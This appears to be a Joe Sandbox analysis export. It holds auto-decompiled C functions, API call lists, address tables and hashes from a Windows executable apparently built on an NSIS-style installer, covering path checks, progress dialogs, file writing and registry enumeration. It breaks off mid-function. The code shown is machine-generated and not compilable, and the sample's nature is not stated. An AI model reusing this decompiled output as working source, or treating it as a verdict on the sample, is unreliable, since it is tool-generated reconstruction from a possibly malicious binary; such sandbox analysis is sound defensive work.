                                      0x004027d0
                                      0x00000000
                                      0x004027d2
                                      0x00000000
                                      0x004027d2
                                      0x00000000
                                      0x004027d0
                                      0x0040279e
                                      0x00402804
                                      0x00402807
                                      0x00000000
                                      0x00402809
                                      0x0040280e
                                      0x0040284f
                                      0x00402871
                                      0x00402878
                                      0x0040285d
                                      0x0040285d
                                      0x00402860
                                      0x00402863
                                      0x00402866
                                      0x00402866
                                      0x00000000
                                      0x00402817
                                      0x00402817
                                      0x0040281a
                                      0x0040281d
                                      0x00402823
                                      0x00402827
                                      0x0040282a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040282a
                                      0x0040280e
                                      0x00402807
                                      0x0040277f
                                      0x0040276b
                                      0x00402760
                                      0x00000000
                                      0x0040282c
                                      0x0040282c
                                      0x0040282f
                                      0x00402838
                                      0x00000000
                                      0x0040272f
                                      0x0040271a
                                      0x00402c33
                                      0x00402c39

                                      APIs
                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                        • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                      • String ID: 9
                                      • API String ID: 163830602-2366072709
                                      • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                      • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                      • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                      • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E004068EF(WCHAR* _a4) {
                                      				short _t5;
                                      				short _t7;
                                      				WCHAR* _t19;
                                      				WCHAR* _t20;
                                      				WCHAR* _t21;
                                      
                                      				_t20 = _a4;
                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                      					_t20 =  &(_t20[4]);
                                      				}
                                      				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                      					_t20 =  &(_t20[2]);
                                      				}
                                      				_t5 =  *_t20;
                                      				_t21 = _t20;
                                      				_t19 = _t20;
                                      				if(_t5 != 0) {
                                      					do {
                                      						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                      							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                      							_t19 = CharNextW(_t19);
                                      						}
                                      						_t20 = CharNextW(_t20);
                                      						_t5 =  *_t20;
                                      					} while (_t5 != 0);
                                      				}
                                      				 *_t19 =  *_t19 & 0x00000000;
                                      				while(1) {
                                      					_push(_t19);
                                      					_push(_t21);
                                      					_t19 = CharPrevW();
                                      					_t7 =  *_t19;
                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                      						break;
                                      					}
                                      					 *_t19 =  *_t19 & 0x00000000;
                                      					if(_t21 < _t19) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				return _t7;
                                      			}








                                      0x004068f1
                                      0x004068fa
                                      0x00406911
                                      0x00406911
                                      0x00406918
                                      0x00406924
                                      0x00406924
                                      0x00406927
                                      0x0040692a
                                      0x0040692f
                                      0x00406931
                                      0x0040693a
                                      0x0040693e
                                      0x0040695b
                                      0x00406963
                                      0x00406963
                                      0x00406968
                                      0x0040696a
                                      0x0040696d
                                      0x00406972
                                      0x00406973
                                      0x00406977
                                      0x00406977
                                      0x00406978
                                      0x0040697f
                                      0x00406981
                                      0x00406988
                                      0x00000000
                                      0x00000000
                                      0x00406990
                                      0x00406996
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406996
                                      0x0040699b

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-3083651966
                                      • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                      • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                      • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                      • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040302E(intOrPtr _a4) {
                                      				short _v132;
                                      				long _t6;
                                      				struct HWND__* _t7;
                                      				struct HWND__* _t15;
                                      
                                      				if(_a4 != 0) {
                                      					_t15 =  *0x420efc;
                                      					if(_t15 != 0) {
                                      						_t15 = DestroyWindow(_t15);
                                      					}
                                      					 *0x420efc = 0;
                                      					return _t15;
                                      				}
                                      				if( *0x420efc != 0) {
                                      					return E00406A71(0);
                                      				}
                                      				_t6 = GetTickCount();
                                      				if(_t6 >  *0x42a26c) {
                                      					if( *0x42a268 == 0) {
                                      						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                      						 *0x420efc = _t7;
                                      						return ShowWindow(_t7, 5);
                                      					}
                                      					if(( *0x42a314 & 0x00000001) != 0) {
                                      						wsprintfW( &_v132, L"... %d%%", E00403012());
                                      						return E004056CA(0,  &_v132);
                                      					}
                                      				}
                                      				return _t6;
                                      			}







                                      0x0040303d
                                      0x0040303f
                                      0x00403046
                                      0x00403049
                                      0x00403049
                                      0x0040304f
                                      0x00000000
                                      0x0040304f
                                      0x0040305d
                                      0x00000000
                                      0x00403060
                                      0x00403067
                                      0x00403073
                                      0x0040307b
                                      0x004030b9
                                      0x004030c2
                                      0x00000000
                                      0x004030c7
                                      0x00403084
                                      0x00403095
                                      0x00000000
                                      0x004030a3
                                      0x00403084
                                      0x004030cf

                                      APIs
                                      • DestroyWindow.USER32 ref: 00403049
                                      • GetTickCount.KERNEL32(00000000), ref: 00403067
                                      • wsprintfW.USER32 ref: 00403095
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                        • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                      • CreateDialogParamW.USER32 ref: 004030B9
                                      • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                        • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 722711167-2449383134
                                      • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                      • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                      • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                      • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                      				long _v8;
                                      				signed char _v12;
                                      				unsigned int _v16;
                                      				void* _v20;
                                      				intOrPtr _v24;
                                      				long _v56;
                                      				void* _v60;
                                      				long _t15;
                                      				unsigned int _t19;
                                      				signed int _t25;
                                      				struct HWND__* _t28;
                                      
                                      				_t28 = _a4;
                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                      				if(_a8 == 0) {
                                      					L4:
                                      					_v56 = _t15;
                                      					_v60 = 4;
                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                      					return _v24;
                                      				}
                                      				_t19 = GetMessagePos();
                                      				_v16 = _t19 >> 0x10;
                                      				_v20 = _t19;
                                      				ScreenToClient(_t28,  &_v20);
                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                      				if((_v12 & 0x00000066) != 0) {
                                      					_t15 = _v8;
                                      					goto L4;
                                      				}
                                      				return _t25 | 0xffffffff;
                                      			}














                                      0x00404f8d
                                      0x00404f9a
                                      0x00404fa0
                                      0x00404fde
                                      0x00404fde
                                      0x00404fed
                                      0x00404ff4
                                      0x00000000
                                      0x00404ff6
                                      0x00404fa2
                                      0x00404fb1
                                      0x00404fb9
                                      0x00404fbc
                                      0x00404fce
                                      0x00404fd4
                                      0x00404fdb
                                      0x00000000
                                      0x00404fdb
                                      0x00000000

                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                      • GetMessagePos.USER32 ref: 00404FA2
                                      • ScreenToClient.USER32(?,?), ref: 00404FBC
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                      • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                      • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                      				short _v132;
                                      				void* _t11;
                                      				WCHAR* _t19;
                                      
                                      				if(_a8 == 0x110) {
                                      					SetTimer(_a4, 1, 0xfa, 0);
                                      					_a8 = 0x113;
                                      				}
                                      				if(_a8 == 0x113) {
                                      					_t11 = E00403012();
                                      					_t19 = L"unpacking data: %d%%";
                                      					if( *0x42a270 == 0) {
                                      						_t19 = L"verifying installer: %d%%";
                                      					}
                                      					wsprintfW( &_v132, _t19, _t11);
                                      					SetWindowTextW(_a4,  &_v132);
                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                      				}
                                      				return 0;
                                      			}






                                      0x00402fa3
                                      0x00402fb1
                                      0x00402fb7
                                      0x00402fb7
                                      0x00402fc5
                                      0x00402fc7
                                      0x00402fd3
                                      0x00402fd8
                                      0x00402fda
                                      0x00402fda
                                      0x00402fe5
                                      0x00402ff5
                                      0x00403007
                                      0x00403007
                                      0x0040300f

                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                      • wsprintfW.USER32 ref: 00402FE5
                                      • SetWindowTextW.USER32 ref: 00402FF5
                                      • SetDlgItemTextW.USER32 ref: 00403007
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                      • API String ID: 1451636040-1158693248
                                      • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                      • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                      • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                      • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00402950(void* __ebx) {
                                      				WCHAR* _t26;
                                      				void* _t29;
                                      				long _t37;
                                      				void* _t49;
                                      				void* _t52;
                                      				void* _t54;
                                      				void* _t56;
                                      				void* _t59;
                                      				void* _t60;
                                      				void* _t61;
                                      
                                      				_t49 = __ebx;
                                      				_t52 = 0xfffffd66;
                                      				_t26 = E00402DA6(0xfffffff0);
                                      				_t55 = _t26;
                                      				 *(_t61 - 0x40) = _t26;
                                      				if(E00405FAE(_t26) == 0) {
                                      					E00402DA6(0xffffffed);
                                      				}
                                      				E00406133(_t55);
                                      				_t29 = E00406158(_t55, 0x40000000, 2);
                                      				 *(_t61 + 8) = _t29;
                                      				if(_t29 != 0xffffffff) {
                                      					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                      					if( *(_t61 - 0x28) != _t49) {
                                      						_t37 =  *0x42a274;
                                      						 *(_t61 - 0x44) = _t37;
                                      						_t54 = GlobalAlloc(0x40, _t37);
                                      						if(_t54 != _t49) {
                                      							E004035F8(_t49);
                                      							E004035E2(_t54,  *(_t61 - 0x44));
                                      							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                      							 *(_t61 - 0x10) = _t59;
                                      							if(_t59 != _t49) {
                                      								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                      								while( *_t59 != _t49) {
                                      									_t51 =  *_t59;
                                      									_t60 = _t59 + 8;
                                      									 *(_t61 - 0x3c) =  *_t59;
                                      									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                      									_t59 = _t60 +  *(_t61 - 0x3c);
                                      								}
                                      								GlobalFree( *(_t61 - 0x10));
                                      							}
                                      							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                      							GlobalFree(_t54);
                                      							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                      						}
                                      					}
                                      					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                      					CloseHandle( *(_t61 + 8));
                                      				}
                                      				_t56 = 0xfffffff3;
                                      				if(_t52 < _t49) {
                                      					_t56 = 0xffffffef;
                                      					DeleteFileW( *(_t61 - 0x40));
                                      					 *((intOrPtr*)(_t61 - 4)) = 1;
                                      				}
                                      				_push(_t56);
                                      				E00401423();
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                      				return 0;
                                      			}













                                      0x00402950
                                      0x00402952
                                      0x00402957
                                      0x0040295c
                                      0x0040295f
                                      0x00402969
                                      0x0040296d
                                      0x0040296d
                                      0x00402973
                                      0x00402980
                                      0x00402988
                                      0x0040298b
                                      0x00402997
                                      0x0040299a
                                      0x004029a0
                                      0x004029ae
                                      0x004029b3
                                      0x004029b7
                                      0x004029ba
                                      0x004029c3
                                      0x004029cf
                                      0x004029d3
                                      0x004029d6
                                      0x004029e0
                                      0x004029ff
                                      0x004029e7
                                      0x004029ec
                                      0x004029f4
                                      0x004029f7
                                      0x004029fc
                                      0x004029fc
                                      0x00402a06
                                      0x00402a06
                                      0x00402a13
                                      0x00402a19
                                      0x00402a1f
                                      0x00402a1f
                                      0x004029b7
                                      0x00402a33
                                      0x00402a35
                                      0x00402a35
                                      0x00402a3f
                                      0x00402a40
                                      0x00402a44
                                      0x00402a48
                                      0x00402a4e
                                      0x00402a4e
                                      0x00402a55
                                      0x004022f1
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                      • CloseHandle.KERNEL32(?), ref: 00402A35
                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                      • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                      • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                      • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                      				char _v68;
                                      				char _v132;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t23;
                                      				signed int _t24;
                                      				void* _t31;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t44;
                                      				signed int _t46;
                                      				signed int _t50;
                                      				signed int _t52;
                                      				signed int _t53;
                                      				signed int _t55;
                                      
                                      				_t23 = _a16;
                                      				_t53 = _a12;
                                      				_t44 = 0xffffffdc;
                                      				if(_t23 == 0) {
                                      					_push(0x14);
                                      					_pop(0);
                                      					_t24 = _t53;
                                      					if(_t53 < 0x100000) {
                                      						_push(0xa);
                                      						_pop(0);
                                      						_t44 = 0xffffffdd;
                                      					}
                                      					if(_t53 < 0x400) {
                                      						_t44 = 0xffffffde;
                                      					}
                                      					if(_t53 < 0xffff3333) {
                                      						_t52 = 0x14;
                                      						asm("cdq");
                                      						_t24 = 1 / _t52 + _t53;
                                      					}
                                      					_t25 = _t24 & 0x00ffffff;
                                      					_t55 = _t24 >> 0;
                                      					_t46 = 0xa;
                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                      				} else {
                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                      					_t50 = 0;
                                      				}
                                      				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                      				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                      				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                      				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                      				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                      			}



















                                      0x00404e7a
                                      0x00404e7f
                                      0x00404e87
                                      0x00404e88
                                      0x00404e95
                                      0x00404e9d
                                      0x00404e9e
                                      0x00404ea0
                                      0x00404ea2
                                      0x00404ea4
                                      0x00404ea7
                                      0x00404ea7
                                      0x00404eae
                                      0x00404eb4
                                      0x00404eb4
                                      0x00404ebb
                                      0x00404ec2
                                      0x00404ec5
                                      0x00404ec8
                                      0x00404ec8
                                      0x00404ecc
                                      0x00404edc
                                      0x00404ede
                                      0x00404ee1
                                      0x00404e8a
                                      0x00404e8a
                                      0x00404e91
                                      0x00404e91
                                      0x00404ee9
                                      0x00404ef4
                                      0x00404f0a
                                      0x00404f1b
                                      0x00404f37

                                      APIs
                                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                      • wsprintfW.USER32 ref: 00404F1B
                                      • SetDlgItemTextW.USER32 ref: 00404F2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$H7B
                                      • API String ID: 3540041739-107966168
                                      • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                      • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                      • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                      • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 48%
                                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                      				void* _v8;
                                      				int _v12;
                                      				short _v536;
                                      				void* _t27;
                                      				signed int _t33;
                                      				intOrPtr* _t35;
                                      				signed int _t45;
                                      				signed int _t46;
                                      				signed int _t47;
                                      
                                      				_t46 = _a12;
                                      				_t47 = _t46 & 0x00000300;
                                      				_t45 = _t46 & 0x00000001;
                                      				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                      				if(_t27 == 0) {
                                      					if((_a12 & 0x00000002) == 0) {
                                      						L3:
                                      						_push(0x105);
                                      						_push( &_v536);
                                      						_push(0);
                                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                      							__eflags = _t45;
                                      							if(__eflags != 0) {
                                      								L10:
                                      								RegCloseKey(_v8);
                                      								return 0x3eb;
                                      							}
                                      							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                      							__eflags = _t33;
                                      							if(_t33 != 0) {
                                      								break;
                                      							}
                                      							_push(0x105);
                                      							_push( &_v536);
                                      							_push(_t45);
                                      						}
